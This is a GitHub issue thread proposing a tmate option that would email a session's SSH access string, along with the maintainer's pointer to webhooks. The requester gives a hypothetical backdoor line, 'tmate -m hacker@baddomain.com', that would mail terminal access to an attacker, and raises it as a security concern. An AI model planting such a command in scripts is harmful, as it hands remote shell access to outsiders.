### ISSUE TITLE
send mail with SSH string using cmdline option

### ISSUE THREAD

**Issue by nerdoc** [tmate-io/tmate#97]
It would be really nice to add a command line option like `-m`, which accepts an email address, where the ssh string is sent to.

So it would be extremely easy to script tmate sessions for newcomers, by just giving them the command

    tmate -m hello@my-email.com

And tmate automatically sends a mail to this address.

This could be considered harmful, as any script then could use tmate as backdoor, by just starting

    tmate -m hacker@baddomain.com

in a script, and he would instantly get a mail with full user access information...
Maybe a manual confirmation could solve that problem.

**Comment by nviennot** [comment]
I haven't got the time to make a web interface for the whole thing with user centric views, where you would see all your connected terminals, perhaps friends, and right click -> share terminal, easily create triggers on certain events, etc.

I'm not clear on the scenario you are describing, but I believe you can do this quite easily if you wrap  things like "Running tmate as a deamon" on https://tmate.io/ or by using Webhooks (https://github.com/tmate-io/tmate/wiki/Webhooks)

**Comment by nerdoc** [comment]
yes, I think this would be possible with webhooks. But I need to set up a webservice that consumes that information. If I just want to send the ssh address to a friend/technical support, it would help to use a simple command for that.
If you want you can close this issue (WONTFIX or the like). I'll find a solution for me ;-)

**Comment by nviennot** [comment]
Yes, webhooks would work well there 👍
